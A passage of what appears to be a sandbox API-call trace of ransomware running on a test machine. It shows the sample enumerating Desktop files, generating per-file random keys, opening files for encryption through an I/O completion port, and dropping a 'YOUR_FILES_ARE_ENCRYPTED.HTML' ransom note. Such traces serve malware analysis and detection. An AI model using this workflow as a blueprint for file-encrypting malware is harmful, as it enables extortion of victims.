ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.543] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.543] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978dfb60, ftCreationTime.dwHighDateTime=0x1d70758, ftLastAccessTime.dwLowDateTime=0x21c05680, ftLastAccessTime.dwHighDateTime=0x1d708f2, ftLastWriteTime.dwLowDateTime=0x21c05680, ftLastWriteTime.dwHighDateTime=0x1d708f2, nFileSizeHigh=0x0, nFileSizeLow=0x3cdc, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="0nCLUahlnH8X3ua_zd0V.png", cAlternateFileName="0NCLUA~1.PNG")) returned 1 [0123.543] StrStrIW (lpFirst="0nCLUahlnH8X3ua_zd0V.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.543] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\0nCLUahlnH8X3ua_zd0V.png") returned 58 [0123.543] PathFindExtensionW (pszPath="0nCLUahlnH8X3ua_zd0V.png") returned=".png" [0123.543] lstrlenW (lpString=".png") returned 4 [0123.543] PathFindExtensionW (pszPath="0nCLUahlnH8X3ua_zd0V.png") returned=".png" [0123.543] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\0nCLUahlnH8X3ua_zd0V.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0ncluahlnh8x3ua_zd0v.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.544] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=15580) returned 1 [0123.544] GetProcessHeap () returned 0x600000 [0123.544] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.547] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="1B") returned 2 [0123.547] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="04") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="24") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="8B") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="4C") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="FD") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="C5") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="5D") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="05") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="C3") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="3B") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="B4") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="1B") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="53") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="B5") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="1B") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="25") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="2C") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="AB") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="23") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="46") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="48") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="F0") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="9F") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="9B") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="09") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="0B") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="FD") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="E1") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="12") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="F6") returned 2 [0123.547] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5D") returned 2 [0123.548] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\0nCLUahlnH8X3ua_zd0V.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\0nCLUahlnH8X3ua_zd0V.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\0nCLUahlnH8X3ua_zd0V.png" [0123.548] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.548] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.548] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4426660, ftCreationTime.dwHighDateTime=0x1d7056f, ftLastAccessTime.dwLowDateTime=0x2a583830, ftLastAccessTime.dwHighDateTime=0x1d705f5, ftLastWriteTime.dwLowDateTime=0x2a583830, ftLastWriteTime.dwHighDateTime=0x1d705f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="9FZjuuIIn", cAlternateFileName="9FZJUU~1")) returned 1 [0123.548] StrStrIW (lpFirst="9FZjuuIIn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.548] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn") returned 43 [0123.548] GetProcessHeap () returned 0x600000 [0123.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0123.549] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn" [0123.549] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\*" [0123.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4426660, ftCreationTime.dwHighDateTime=0x1d7056f, ftLastAccessTime.dwLowDateTime=0x2a583830, ftLastAccessTime.dwHighDateTime=0x1d705f5, ftLastWriteTime.dwLowDateTime=0x2a583830, ftLastWriteTime.dwHighDateTime=0x1d705f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xc35e22, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0123.553] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4426660, ftCreationTime.dwHighDateTime=0x1d7056f, ftLastAccessTime.dwLowDateTime=0x2a583830, ftLastAccessTime.dwHighDateTime=0x1d705f5, ftLastWriteTime.dwLowDateTime=0x2a583830, ftLastWriteTime.dwHighDateTime=0x1d705f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xc35e22, cFileName="..", cAlternateFileName="")) returned 1 [0123.553] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97742bc0, ftCreationTime.dwHighDateTime=0x1d6fc29, ftLastAccessTime.dwLowDateTime=0x9bd43b20, ftLastAccessTime.dwHighDateTime=0x1d709ca, ftLastWriteTime.dwLowDateTime=0x9bd43b20, ftLastWriteTime.dwHighDateTime=0x1d709ca, nFileSizeHigh=0x0, nFileSizeLow=0x1014a, dwReserved0=0x19ec60, dwReserved1=0xc35e22, cFileName="2ZS3iZs.xlsx", cAlternateFileName="2ZS3IZ~1.XLS")) returned 1 [0123.554] StrStrIW (lpFirst="2ZS3iZs.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.554] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\2ZS3iZs.xlsx") returned 56 [0123.554] PathFindExtensionW (pszPath="2ZS3iZs.xlsx") returned=".xlsx" [0123.554] lstrlenW (lpString=".xlsx") returned 5 [0123.554] PathFindExtensionW (pszPath="2ZS3iZs.xlsx") returned=".xlsx" [0123.554] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\2ZS3iZs.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9fzjuuiin\\2zs3izs.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0123.555] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=65866) returned 1 [0123.555] GetProcessHeap () returned 0x600000 [0123.555] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0123.558] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="3D") returned 2 [0123.558] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="7E") returned 2 [0123.558] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="41") returned 2 [0123.558] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="1D") returned 2 [0123.558] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="95") returned 2 [0123.558] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="89") returned 2 [0123.558] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="E3") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="0C") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="08") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="6B") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="B6") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="99") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="47") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="C0") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="D8") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="4F") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="F3") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="4F") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="D7") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="89") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="6B") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="E2") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="4E") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="69") returned 2 [0123.558] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="E7") returned 2 [0123.559] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="47") returned 2 [0123.559] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="D8") returned 2 [0123.559] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="14") returned 2 [0123.559] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="A9") returned 2 [0123.559] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="B9") returned 2 [0123.559] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="10") returned 2 [0123.559] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="48") returned 2 [0123.559] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\2ZS3iZs.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\2ZS3iZs.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\2ZS3iZs.xlsx" [0123.559] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.559] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0123.559] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c963d90, ftCreationTime.dwHighDateTime=0x1d6fe7d, ftLastAccessTime.dwLowDateTime=0xac2034f0, ftLastAccessTime.dwHighDateTime=0x1d70904, ftLastWriteTime.dwLowDateTime=0xac2034f0, ftLastWriteTime.dwHighDateTime=0x1d70904, nFileSizeHigh=0x0, nFileSizeLow=0x15c37, dwReserved0=0x19ec60, dwReserved1=0xc35e22, cFileName="bpJs7Eoem76S.mp3", cAlternateFileName="BPJS7E~1.MP3")) returned 1 [0123.559] StrStrIW (lpFirst="bpJs7Eoem76S.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.559] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\bpJs7Eoem76S.mp3") returned 60 [0123.559] PathFindExtensionW (pszPath="bpJs7Eoem76S.mp3") returned=".mp3" [0123.559] lstrlenW (lpString=".mp3") returned 4 [0123.559] PathFindExtensionW (pszPath="bpJs7Eoem76S.mp3") returned=".mp3" [0123.559] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\bpJs7Eoem76S.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9fzjuuiin\\bpjs7eoem76s.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.560] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=89143) returned 1 [0123.560] GetProcessHeap () returned 0x600000 [0123.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0123.562] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="AA") returned 2 [0123.562] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="87") returned 2 [0123.562] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="7F") returned 2 [0123.562] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="2F") returned 2 [0123.562] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="6C") returned 2 [0123.562] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="11") returned 2 [0123.562] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="8C") returned 2 [0123.562] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="B3") returned 2 [0123.562] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="AC") returned 2 [0123.562] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="E8") returned 2 [0123.562] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="61") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="1F") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="4D") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="1B") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="B3") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="33") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="AA") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="6F") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="F2") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="B8") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="5D") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="8C") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="0B") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="79") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="88") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="1B") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="E2") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="F5") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="4B") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="32") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="76") returned 2 [0123.563] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="5E") returned 2 [0123.564] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\bpJs7Eoem76S.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\bpJs7Eoem76S.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\bpJs7Eoem76S.mp3" [0123.564] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.564] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0123.564] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c963d90, ftCreationTime.dwHighDateTime=0x1d6fe7d, ftLastAccessTime.dwLowDateTime=0xac2034f0, ftLastAccessTime.dwHighDateTime=0x1d70904, ftLastWriteTime.dwLowDateTime=0xac2034f0, ftLastWriteTime.dwHighDateTime=0x1d70904, nFileSizeHigh=0x0, nFileSizeLow=0x15c37, dwReserved0=0x19ec60, dwReserved1=0xc35e22, cFileName="bpJs7Eoem76S.mp3", cAlternateFileName="BPJS7E~1.MP3")) returned 0 [0123.564] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0123.564] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0123.564] GetProcessHeap () returned 0x600000 [0123.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\9FZjuuIIn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9fzjuuiin\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0123.571] WriteFile (in: hFile=0x304, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0123.573] CloseHandle (hObject=0x304) returned 1 [0123.573] GetProcessHeap () returned 0x600000 [0123.573] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.573] GetProcessHeap () returned 0x600000 [0123.573] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0123.573] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b66f0, ftCreationTime.dwHighDateTime=0x1d703f9, ftLastAccessTime.dwLowDateTime=0x8286d370, ftLastAccessTime.dwHighDateTime=0x1d704fd, ftLastWriteTime.dwLowDateTime=0x8286d370, ftLastWriteTime.dwHighDateTime=0x1d704fd, nFileSizeHigh=0x0, nFileSizeLow=0x3c5a, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="anT3.ods", cAlternateFileName="")) returned 1 [0123.573] StrStrIW (lpFirst="anT3.ods", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.573] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\anT3.ods") returned 42 [0123.573] PathFindExtensionW (pszPath="anT3.ods") returned=".ods" [0123.573] lstrlenW (lpString=".ods") returned 4 [0123.573] PathFindExtensionW (pszPath="anT3.ods") returned=".ods" [0123.573] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\anT3.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ant3.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0123.574] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=15450) returned 1 [0123.574] GetProcessHeap () returned 0x600000 [0123.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.577] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="8A") returned 2 [0123.577] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="46") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="C7") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="DD") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="27") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="AA") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="1E") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="9C") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="03") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="3E") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="F0") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="39") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="30") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="9F") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="4F") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="6D") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="BC") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="86") returned 2 [0123.577] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="E5") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="90") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="F6") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="65") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="6B") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="32") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="7C") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="5C") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="C3") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="FD") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="D8") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="8C") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="75") returned 2 [0123.609] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="07") returned 2 [0123.610] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\anT3.ods" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\anT3.ods") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\anT3.ods" [0123.610] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.610] PostQueuedCompletionStatus (CompletionPort=0x274, 